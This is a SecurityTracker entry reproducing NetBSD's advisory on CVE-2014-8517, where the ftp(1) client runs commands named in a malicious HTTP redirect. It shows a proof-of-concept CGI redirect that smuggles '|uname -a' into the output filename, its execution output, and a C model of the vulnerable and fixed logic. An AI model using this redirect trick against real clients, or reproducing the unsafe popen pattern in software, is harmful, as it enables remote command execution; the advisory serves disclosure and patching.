Category:   Application (File Transfer/Sharing)  >   FTP (Generic) Vendors:   NetBSD
(NetBSD Issues Fix) BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System
SecurityTracker Alert ID:  1031154
SecurityTracker URL:
CVE Reference:   CVE-2014-8517   (Links to External Site)
Date:  Nov 3 2014
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in some BSD-based FTP clients. A remote user can cause arbitrary commands to be executed on the target user's system.

A remote HTTP server can return a specially crafted redirect (a Location header whose last path component begins with '|') to a connected client to cause the target client to execute arbitrary commands on the target system.

The vulnerability is triggered when ftp(1) is used to fetch an HTTP URL and no output file is specified with '-o': the client derives the output filename from the final URL it is redirected to, and an output filename beginning with '|' is passed to popen(3).

NetBSD tnftp(1) is affected. In NetBSD, the vulnerability resides in 'src/usr.bin/ftp/fetch.c'.

Apple OS X is affected.

FreeBSD is affected.

OpenBSD is not affected.

Other BSD-based systems may be affected.

Jared McNeill reported this vulnerability.

Impact:   A remote user can cause arbitrary commands to be executed on the target connected user's system.
Solution:   NetBSD has issued a fix.

The NetBSD advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  UNIX (NetBSD)
Underlying OS Comments:  5.1, 5.2, 6.0, 6.1

Message History:   This archive entry is a follow-up to the message listed below.
Oct 30 2014 BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System

 Source Message Contents

Subject:  NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver


		NetBSD Security Advisory 2014-013

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver

Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp)	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.

Technical Details

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not

After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).

Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.

     a20$ pwd
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location:|uname%20-a'

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     BOARD evbarm
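The filename selection described above, modelled in C as an added example. This is not the code from src/usr.bin/ftp/fetch.c; the "fixed" variant implements the advisory's description of the change (the '|' convention is honoured only for user-supplied names), not the literal revision 1.206 diff. Assumed simplifications: the URL passed in is already the final redirect target, and query strings and fragments are not handled.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Where the fetched body goes: fopen() of a file, or popen() of a command. */
enum sink { SINK_FILE, SINK_PIPE };

static int hexval(int c)
{
	if (c >= '0' && c <= '9')
		return c - '0';
	c = tolower(c);
	if (c >= 'a' && c <= 'f')
		return c - 'a' + 10;
	return -1;
}

/* Percent-decode src into dst; dst must have room for strlen(src) + 1 bytes.
 * This is why "Location:|uname%20-a" in the advisory ends up as "uname -a". */
static void url_decode(char *dst, const char *src)
{
	while (*src != '\0') {
		if (src[0] == '%' && hexval(src[1]) >= 0 && hexval(src[2]) >= 0) {
			*dst++ = (char)(hexval(src[1]) * 16 + hexval(src[2]));
			src += 3;
		} else {
			*dst++ = *src++;
		}
	}
	*dst = '\0';
}

/* Local save name from a URL: the text after the last '/', percent-decoded.
 * A bare "|uname%20-a" has no '/', so the whole value becomes the name.
 * Returns 0 on success, -1 if the name does not fit. */
static int save_name_from_url(const char *url, char *name, size_t namelen)
{
	const char *cp = strrchr(url, '/');
	const char *last = (cp != NULL) ? cp + 1 : url;
	char decoded[256];

	if (strlen(last) >= sizeof(decoded) || strlen(last) >= namelen)
		return -1;
	url_decode(decoded, last);	/* decoding never lengthens the string */
	strcpy(name, decoded);
	return 0;
}

/* Resolve the output name: the -o argument if given, else derived from the URL. */
static int resolve_name(const char *url, const char *user_outfile,
    char *name, size_t namelen)
{
	if (user_outfile != NULL) {
		if (strlen(user_outfile) >= namelen)
			return -1;
		strcpy(name, user_outfile);
		return 0;
	}
	return save_name_from_url(url, name, namelen);
}

/* Pre-fix behaviour (CVE-2014-8517): a leading '|' selects popen(3) no matter
 * where the name came from, so a redirect target can pick the command. */
int choose_sink_vulnerable(const char *url, const char *user_outfile,
    char *name, size_t namelen)
{
	if (resolve_name(url, user_outfile, name, namelen) != 0)
		return -1;
	return name[0] == '|' ? SINK_PIPE : SINK_FILE;
}

/* Post-fix behaviour as the advisory describes it: '|command' is honoured only
 * for a name the user typed with -o. A server-derived name that begins with
 * '|' is treated as an ordinary (if odd) file name. */
int choose_sink_fixed(const char *url, const char *user_outfile,
    char *name, size_t namelen)
{
	if (resolve_name(url, user_outfile, name, namelen) != 0)
		return -1;
	if (user_outfile != NULL && name[0] == '|')
		return SINK_PIPE;
	return SINK_FILE;
}

int main(void)
{
	/* Final redirect target from the advisory's demonstration. */
	const char *url = "http://localhost/cgi-bin/|uname%20-a";
	char name[128];
	int v = choose_sink_vulnerable(url, NULL, name, sizeof name);
	printf("vulnerable: \"%s\" -> %s\n", name, v == SINK_PIPE ? "popen()" : "fopen()");
	int f = choose_sink_fixed(url, NULL, name, sizeof name);
	printf("fixed:      \"%s\" -> %s\n", name, f == SINK_PIPE ? "popen()" : "fopen()");
	return 0;
}
```

Run it and the vulnerable path reports "|uname -a" going to popen(), while the fixed path keeps the same name but opens it as a file; passing "|wc -c" as the -o argument still yields a pipe in both, which is the documented ftp(1) feature the fix preserves.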

Solutions and Workarounds

Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.

Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206

Thanks To

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.

Revision History

	2014-11-03	Initial release

More Information

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at

Information about NetBSD and NetBSD security can be found at and .

Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $


